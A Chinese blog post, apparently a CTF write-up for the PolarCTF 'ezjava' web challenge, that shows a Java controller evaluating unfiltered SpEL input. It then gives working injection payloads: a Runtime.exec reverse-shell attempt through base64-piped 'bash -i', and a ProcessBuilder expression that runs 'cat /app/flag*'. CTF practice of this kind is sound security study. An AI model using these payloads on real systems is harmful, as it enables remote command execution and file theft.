PolarCTF WEB题目 ezjava WP

已于 2023-10-13 10:21:36 修改
阅读量437 收藏 1
点赞数 2
分类专栏: CTF 文章标签: 前端 java 网络安全 代码复审 web安全
于 2023-10-13 10:17:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_62257805/article/details/133804482
版权

一、题目信息

先附上靶场链接:www.polarctf.com
ezjava这道题给了个jar包,所以先下载下来反编译看看怎么个事。
在这里插入图片描述
直接放入idea中并添加为库,反编译看看内容:
在这里插入图片描述

二、SPEL注入漏洞

controller层中存在如下代码:

    public String spelVul(String ex) {
        ExpressionParser parser = new SpelExpressionParser();
        EvaluationContext evaluationContext = new StandardEvaluationContext();
        String result = parser.parseExpression(ex).getValue(evaluationContext).toString();
        System.out.println(result);
        return result;
    }

熟悉Java的朋友就可以一眼定真,这不是spel表达式注入嘛?
ex参数没有任何过滤直接打就可。
路由:/SPEL/vul,可以看到2-1确实返回了运算结果,说明能解析。
在这里插入图片描述
尝试弹个shell到服务器:

T(java.lang.Runtime).getRuntime().exec("bash -c {echo,xxxxxxxxxxxxxxxxxxx}|{base64,-d}|{bash,-i}")

弹了半天连不上,不解析?有waf? 靶场不出网!
那就直接读flag吧,题目给了flag路径/app/flag.txt

new java.io.BufferedReader(new java.io.InputStreamReader(new ProcessBuilder(new String[]{"bash","-c","cat /app/flag*"}).start().getInputStream(), "gbk")).readLine()

发包即可:

Bestow.992
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF webwp
weixin_45694388的博客
10-11 1007
1.签到题 火狐F12查看源码,发现注释: 一次base64解码出flag 2.Encode 在这里插入图片描述 和第一题界面一样?? 轻车熟路f12: 发现编码: 格式看上去是base64,连续两次base64后,观察格式后发现是hex编码,解码出flag 3.Decoede me 一道php的加密题 strrev(): 逆序 substr(): 返回字符串第0以后的1位ord():ord()函数返回字符串的首个字符的ASCII值。chr():从ascii表返回第_0以后的1位 ord(): or
实验吧WEB题目WP
08-10
这是自己做的一个实验吧的十七到题目WP,其中也有别人的WP
NSS [NUSTCTF 2022 新生赛]Ezjava1
Jay17的博客
08-30 808
NSS [NUSTCTF 2022 新生赛]Ezjava1
第十五届蓝桥杯网络安全赛项 ezjava writeup
最新发布
weixin_45936149的博客
04-27 853
第15届蓝桥杯ezjava writeup
Polar_CTF_REVERSE_Java_Tools
weixin_62626298的博客
10-13 166
Judge() : 函数首先定义了两个Character形数组,这个函数展示了 不同类型的字符数据 如何转为同一类型,本函数中有两个方法,如果一个是String 类型,一个是Char 数组类型,即使内容相等,equals函数 也会返回False。Tools类中有四个函数,分别是Re,Xor,ADD_1,Judge函数,分别分析一下他们的功能。Add_1 () : 对传入的字符串数组的每一位 进行 后移操作,后移的不长是我们传入的参数X。输入的类,进行了两次输出,一次输入,并调用了。中的三个函数,分别是。
Polarctfweb ezjava
xsx213的博客
10-13 195
2.传入参数base64解码放入字节流数组,调用ByteArrayInputStream读入对象,再调用readject()方法。该题考点为java反序列化。1.附件jar包,下载反编译查看源码。4. 传入链条,得到flag。3.构造cc5反序列化链。
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
m0_61206225的博客
11-08 1083
N1CTF2022 WEB题3道java WP(OldFasjson那题待更新)
wpWeb服务编程案例
04-03
在Windows Phone(简称WP)平台上,开发者可以利用Web服务编程技术来创建强大的应用程序,与远程服务器进行数据交换,实现丰富的功能。本案例旨在探讨如何在Windows Phone设备上开发Web服务应用,通过集成Web服务,...
ctfshow-VIP题目-Web-详细解题思路
01-27
本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制泄露、vim临时文件泄露、cookie泄露、...
CTF-5#进击!拿到Web最高权限-WP
10-23
CTF/Web安全/ WP最高权限获取 CTF(Capture The Flag)是一种信息安全竞赛形式,目的是为了让参与者通过解决各种挑战和谜题来获取 Flags,证明自己的信息安全能力。WPWeb)是CTF中的一种挑战形式,旨在让参与者...
Web编程2:wp2
02-12
在本项目"Web编程2:wp2"中,我们将深入探讨网络编程的各个方面,特别是与PHP相关的技术。项目成员包括Rifki Azizi和18090020号学员,以及团队成员5A。从提供的文件名"Web-Programming-2-main"来看,这可能是一个...
Github:ez java学习
03-06
我做的第一件事 这是非常基础的Java东西 我发布我需要的项目和东西,这里的一切都是我制造的,除非它在开始时有一个@author,我会把它们归功于它!!! 示例:C
[祥云杯 2022]ezjava
Sentiment的博客
11-04 1024
比赛中卡在了内存马上,了解完Controller和Interceptor内存马后,再来复现一下。
[JAVA安全分享]从第二届网刃杯CTF题目学习JAVA SPEL表达式注入
GX233的博客
04-27 1908
SPEL注入
PolarD&N-CTF-web方向-困难
J1ng_Hong的博客
12-13 1562
或者在payload中更改不可见字符为%00也可以,但是flag不在当前目录,wp说flag在上一级目录,那么我们payload中要读取的是../flag.php就可以了。
从CTF学习Java反序列化
why811的博客
08-18 844
我们可以看到cookie里面返回了Java序列化内容,带着cookie访问返回了hello {{username}}的字符,说明我们传入的cookie被反序列化了。其实看到LogHandler不能反序列化的时候,直接一口否定了他的可利用性,并没有去尝试,那么为什么不实际尝试一下呢?其实再仔细一点,可以发现这个类继承了HashSet,HashSet实现了Serializable接口,貌似可以搞事。(但是打final的时候是没有公网的,附件只有源码,需要去靶机上面把本地repo拖下来。
CTF攻防赛java反编译题
qq_40872999的博客
09-10 2128
CTF攻防赛java反编译题Reverse.class已知Reverse.class文件 Reverse.class 已知Reverse.class文件 打开方式:idea,eclipse等java工具,记事本打开乱码 // // Source code recreated from a .class file by IntelliJ IDEA // (powered by Fernflower ...
PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp
Jay17的博客
12-10 2517
PolarCTF网络安全2023冬季个人挑战赛 WEB方向题解 WriteUp
【CTFjava反序列-2020-网鼎杯-朱雀组-Web-think_java
(∪.∪ )...zzz的博客
06-13 3565
看目录!读代码如何寻找突破口?存在sql注入抓包 注入语句写在数据包里swagger开发接口login输入用户名密码得到返回数据包user current 读代码 如何寻找突破口? 存在sql注入 抓包 注入语句写在数据包里 (这个包抓错了,所以没有显示密码) /common/test/sqlDict dbName=myapp?a=’ union select (select pwd from user)# “tableDescribe”:“ctfhub_8978
ctf-qsnctf此地无银三百
02-20
ctf-qsnctf是一个CTF(Capture The Flag)比赛平台,它提供了一系列的网络安全挑战,旨在帮助参与者提升网络安全技能和解决问题的能力。在ctf-qsnctf平台上,参与者可以通过解决各种类型的题目来获取旗帜(flag),并提交给平台进行验证。 "此地无银三百"是ctf-qsnctf平台上的一道题目,它的名称可能是一个提示,暗示着解题的思路。具体的解题方法和答案我无法透露,因为这会破坏比赛的公平性和乐趣。如果你对这道题目感兴趣,我建议你在ctf-qsnctf平台上注册账号并参与比赛,通过自己的努力和思考来解决问题。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值